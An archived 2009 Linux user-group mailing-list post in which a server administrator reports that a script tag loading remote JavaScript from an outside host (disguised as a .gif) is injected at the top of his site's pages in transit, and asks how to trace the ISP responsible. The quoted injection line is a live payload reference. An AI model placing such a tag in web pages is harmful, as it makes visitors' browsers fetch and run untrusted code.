| Jaco Kroon on Sun, 3 May 2009 09:27:04 +0200 (SAST) |
[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]
| [GLUG-tech] possible http threat - or just some weirdness |
Hi all, One of my clients just notified me of a "threat" on one of my servers, when I request the site via mozilla firefox, the first lines reads as follows: <script language=javascript src=http://phpl.ca/Img/pen.gif></script> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd";> <html> I get the same with wget from my desktop machine. If I request this on the server itself using wget, I get this as is without the first script line. This to me (without going the tcpdump route on the server itself) indicates that my data is being modified in transit! Now, we all know this is perfectly possible, the question is - how do I figure out where this is happening, and which ISP I should get to clean up. Based on my incoming path this is either SAIX or IS, and I rather suspect it will be SAIX's transparent proxies - but how do I confirm that? If this wasn't happening on each and every single request I'd say we have a possible split response http proxy poisoning attack but those are generally not overly reliable and was still under heavy research last I checked. I've made a copy of pen.gif (which as expected turns out to be javascript code). What else should I be gathering around this? Jaco -- To unsubscribe: send the line "unsubscribe glug-tech" in the subject of a mail to "glug-tech-request@xxxxxxxxxxxx". Problems? Email "glug-tech-admins@xxxxxxxxxxxx". Archives are at http://www.linux.org.za/Lists-Archives/ RULES: http://www.linux.org.za/glugrules.html